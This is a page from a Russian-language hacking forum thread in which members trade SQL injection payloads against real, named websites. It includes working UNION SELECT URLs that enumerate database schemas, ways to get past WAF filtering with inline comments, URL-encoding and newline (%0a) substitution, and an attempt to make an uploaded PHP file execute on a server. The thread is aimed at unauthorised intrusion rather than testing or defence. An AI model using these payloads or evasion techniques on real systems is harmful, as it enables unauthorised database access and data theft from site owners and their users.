Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Залей форму для загрузки файлов.
     
  2. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Открой сурс и посмотри. Скорее всего спецсимволы типа "<" записались в урлкодированном виде.
    Пошли запрос не через браузер, а через HttpReq \ InetCrack \ или что-нибудь такого рода.
     
    #16822 Tigger, 23 May 2011
    Last edited: 23 May 2011
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    все символы записываются как надо, хтмл форму отоброжает а пхп не выполняет и отоброжает код пхп...
     
    _________________________
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    может что нить с .htaccess грамотное посоветуйте?
     
    _________________________
  5. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    FlaktW
    Какой смысл этого если у него PHP не интерпретируется?

    Не удивительно =\

    winstrool
    Скинь мне линк в ПМ, посмотрю.
     
    #16825 Tigger, 23 May 2011
    Last edited: 23 May 2011
  6. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Ну так попробуй залить в другую директорию.
     
  7. kartes1984

    kartes1984 New Member

    Joined:
    16 May 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    http://www.tvlab.com.ua/news/?id=-1+UNION+SELECT+1,2,group_concat(CPU_USER,0x3b,CPU_SYSTEM),4,5+from+information_schema.profiling+--+
    проблема с выводом данных
    Попытался открыть базу tvlab не показало ни одной таблицы так ли это? :confused:
     
  8. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12

    http://www.tvlab.com.ua/news/?id=-1+UNION+SELECT+1,2,count(*),4,5+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+--+

    1


    http://www.tvlab.com.ua/news/?id=-1+UNION+SELECT+1,2,group_concat(0x0b,table_schema,0x3a,table_name),4,5+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+--+

    tvlab:news
     
  9. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Как здесь обойти фильтрацию. Ветка БД на сайте 5, блиндом крутить лень.


    http://www.gidacilar.com/view.php?id=1865'/**/*!union*/**/*!select*/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+--+&type=print
     
  10. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    А в чём именно сложность заключается?

    Code:
    http://www.gidacilar.com/view.php?id=9999%27UnioN%28SelecT%281%29,2,3,4,5,6,user%28%29,8,9,10,11,12,13,14,15,16,17,18,19,20%20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,%2841%29%29--+&type=print
     
    2 people like this.
  11. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    помогите разобраться, вот скуль
    на from срабатывает ошибка, пробовал хексить не помогает, символы /!* тоже не помогают, что можно придумать в такой ситуации?
     
    _________________________
  12. o'clock

    o'clock Elder - Старейшина

    Joined:
    16 May 2009
    Messages:
    125
    Likes Received:
    22
    Reputations:
    11
    БД зовут eshokcomua, а вот таблицы найти не смог...
     
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    так стандартный вывод тоже вывел
    а вот когда начинаю использовать фром начинает выделываться...
     
    _________________________
  14. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    http://eshoker.com.ua/product.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+vse_chto_ugodno+--+
     
    _________________________
  15. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не все, точку например нельзя!

    http://eshoker.com.ua/buy.php?id=9+and+1=0+union+select+1,user(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+information_schema.table+--+&lang=ua

    http://eshoker.com.ua/buy.php?id=9+and+1=0+union+select+1,user(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+information_schematable+--+&lang=ua
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    без FROM там не обоийтись, по крайней мере я таких способов незнаю))
     
    _________________________
  17. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    http://eshoker.com.ua/buy.php?id=9%0aand%0a1=0%0aunion%0aselect%0a1,2,table_name,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20%0afrom%0ainformation_schema.tables--+&lang=ua

    Все выводится...
     
    2 people like this.
  18. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12

    Извините за наивный вопрос. Где можно почитать про этот способ?
     
  19. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    %0a это символ перевода строки "\n"
     
    _________________________
    1 person likes this.
  20. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    204
    Likes Received:
    277
    Reputations:
    32
    *:\Services\_InetPub\Domain\
    *:\Services\_InetPub\Domain\subDomain\
    Может оно
     
Thread Status:
Not open for further replies.